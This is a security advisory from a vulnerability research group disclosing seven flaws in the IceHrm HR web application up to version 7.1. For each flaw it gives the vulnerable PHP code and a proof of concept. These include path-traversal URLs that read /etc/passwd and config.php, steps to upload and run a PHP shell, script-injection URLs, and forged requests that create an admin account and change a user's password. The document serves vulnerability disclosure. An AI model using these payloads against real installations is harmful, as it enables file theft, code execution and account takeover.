IceHrm <=7.1 Multiple Vulnerabilities


Vendor: IceHRM
Product web page: http://www.icehrm.com
Affected version: <= 7.1


Summary: IceHrm is Human Resource Management web software
for small and medium sized organizations. The software is
written in PHP. It has community (free), commercial and
hosted (cloud) solution.

Desc: IceHrm <= 7.1 suffers from multiple vulnerabilities
including Local File Inclusion, Cross-Site Scripting, Malicious
File Upload, Cross-Site Request Forgery and Code Execution.

Tested on: Apache/2.2.15 (Unix)
           PHP/5.3.3
           MySQL 5.1.73


Vulnerabilities discovered by Stefan 'sm' Petrushevski
                              @zeroscience


Advisory ID: ZSL-2014-5215
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5215.php


01.12.2014

---


1. Local File Inclusion (LFI) 
#####################################################
File: 
app/index.php

Vulnerable code:
---- snip ----
include APP_BASE_PATH.'/'.$group.'/'.$name.'/index.php';
app/?g=../&n=../../../../etc/passwd%00
---- snip ----

Proof of Concept (PoC):
http://zsltest/icehrm/app/?g=../&n=../../../../etc/passwd%00

Severity:  CRITICAL
#####################################################


2. Local File Inclusion (LFI)
#####################################################
File:
service.php

Vulnerable code:
---- snip ----
if($action == 'download'){
	$fileName = $_REQUEST['file'];
	$fileName = CLIENT_BASE_PATH.'data/'.$fileName;
	header('Content-Description: File Transfer');
	header('Content-Type: application/octet-stream');
	header('Content-Disposition: attachment; filename='.basename($fileName));
	header('Content-Transfer-Encoding: binary');
	header('Expires: 0');
	header('Cache-Control: must-revalidate');
	header('Pragma: public');
	header('Content-Length: ' . filesize($fileName));
	ob_clean();
	flush();
	readfile($fileName);
---- snip ----

Proof of Concept (PoC):
http://zsltest/icehrm/app/service.php?a=download&file=../config.php

Severity:  CRITICAL
#####################################################


3. Malicious File Upload / Code Execution
#####################################################
File:
fileupload.php 

Vulnerable code:
---- snip ----
//Generate File Name
$saveFileName = $_POST['file_name'];
if(empty($saveFileName) || $saveFileName == "_NEW_"){
	$saveFileName = microtime();
	$saveFileName = str_replace(".", "-", $saveFileName);	
}

$file = new File();
$file->Load("name = ?",array($saveFileName));

// list of valid extensions, ex. array("jpeg", "xml", "bmp")

$allowedExtensions = explode(',', "csv,doc,xls,docx,xlsx,txt,ppt,pptx,rtf,pdf,xml,jpg,bmp,gif,png,jpeg");
// max file size in bytes
$sizeLimit =MAX_FILE_SIZE_KB * 1024;
$uploader = new qqFileUploader($allowedExtensions, $sizeLimit);
$result = $uploader->handleUpload(CLIENT_BASE_PATH.'data/',$saveFileName);
// to pass data through iframe you will need to encode all html tags

if($result['success'] == 1){
	$file->name = $saveFileName;
	$file->filename = $result['filename'];
	$file->employee = $_POST['user']=="_NONE_"?null:$_POST['user'];
	$file->file_group = $_POST['file_group'];
	$file->Save();
	$result['data'] = CLIENT_BASE_URL.'data/'.$result['filename'];
	$result['data'] .= "|".$saveFileName;
	$result['data'] .= "|".$file->id;
}
---- snip ----

Proof of Concept (PoC) method:
1. Change the 'file_name' request parameter in desired filename. The file will be saved in 'data' folder.
Example: file_name = dsadsa.php ==will be saved in==> data/dsadsa.php.txt
2. Create a malicious file (php shell) save it with .txt extension
3. Upload the malicious file (php shell) via the upload form in fileupload_page.php. The file will appear in ‘data’ folder as dsadsa.php.txt.
4. Access the file – http://zsltest/icehrm/data/dsadsa.php.txt to execute the php code.

PoC example:
1. http://zsltest/icehrm/app/fileupload_page.php?id=xxx.php&msg=Upload%20Attachment&file_group=EmployeeDocument&file_type=all&user=1
2. xxx.txt contents:
<?php phpinfo(); ?>
3. Upload the filename
4. Access the file:

Severity:  CRITICAL
#####################################################


4. Cross-Site Scripting (XSS)
#####################################################
File:
login.php

Vulnerable code:
---- snip ----
  <script type="text/javascript">
	var key = "";
  <?php if(isset($_REQUEST['key'])){?>
  	key = '<?=$_REQUEST['key']?>';
  	key = key.replace(/ /g,"+");
  <?php }?>
---- snip ----

Proof of Concept (PoC):
http://zsltest/icehrm/app/login.php?key=';</script><script>alert(‘zsl’);</script>

Severity:  MEDIUM
#####################################################


5. Cross-Site Scripting (XSS)
#####################################################
File:
fileupload_page.php

Vulnerable code:
---- snip ----
<div id="upload_form">
<form id="upload_data" method="post" action="<?=CLIENT_BASE_URL?>fileupload.php" enctype="multipart/form-data">
<input id="file_name" name="file_name" type="hidden" value="<?=$_REQUEST['id']?>"/>
<input id="file_group" name="file_group" type="hidden" value="<?=$_REQUEST['file_group']?>"/>
<input id="user" name="user" type="hidden" value="<?=$_REQUEST['user']?>"/>
<label id="upload_status"><?=$_REQUEST['msg']?></label><input id="file" name="file"  type="file" onChange="if(checkFileType('file','<?=$fileTypes?>')){uploadfile();}"></input>
…
---- snip ----

Vulnerable parameters: id, file_group, user, msg

Proof of Concept (PoC):
http://zsltest/icehrm/fileupload_page.php?id=XXXX%22%3E%3Cscript%3Ealert(‘zsl’)%3C/script%3E

Severity:  MEDIUM
#####################################################


6. Information Disclosure / Leaking Sensitive User Info
#####################################################
Users’/employees’ profile images are easily accessible in the ‘data’ folder.

Proof of Concept (PoC):
http://192.168.200.119/icehrm/app/data/profile_image_1.jpg
http://192.168.200.119/icehrm/app/data/profile_image_X.jpg <- x=user id

Severity:  LOW
#####################################################


7. Cross-Site Request Forgery (CSRF)
#####################################################
All forms are vulnerable to CSRF.

Documents library:
http://localhost/icehrm/app/service.php
POST 
document=2&valid_until=&status=Inactive&details=detailz&attachment=attachment_evi4t3VuKqDfyY&a=add&t=EmployeeDocument

Personal info:
http://localhost/icehrm/app/service.php
GET 
t=Employee
a=ca
sa=get
mod=modules=employees
req={"map":"{\"nationality\":[\"Nationality\",\"id\",\"name\"],\"employment_status\":[\"EmploymentStatus\",\"id\",\"name\"],\"job_title\":[\"JobTitle\",\"id\",\"name\"],\"pay_grade\":[\"PayGrade\",\"id\",\"name\"],\"country\":[\"Country\",\"code\",\"name\"],\"province\":[\"Province\",\"id\",\"name\"],\"department\":[\"CompanyStructure\",\"id\",\"title\"],\"supervisor\":[\"Employee\",\"id\",\"first_name+last_name\"]}"}

Add new admin user:
http://localhost/icehrm/app/service.php
POST
username=test5&email=test5%40zeroscience.mk&employee=1&user_level=Admin&a=add&t=User

Change password of user:
http://localhost/icehrm/app/service.php?
GET
t=User
a=ca
sa=changePassword
mod=admin=users
req={"id":5,"pwd":"newpass"}

Add/edit modules:
http://localhost/icehrm/app/service.php
POST
t=Module&a=get&sm=%7B%7D&ft=&ob=

Severity:  LOW
#####################################################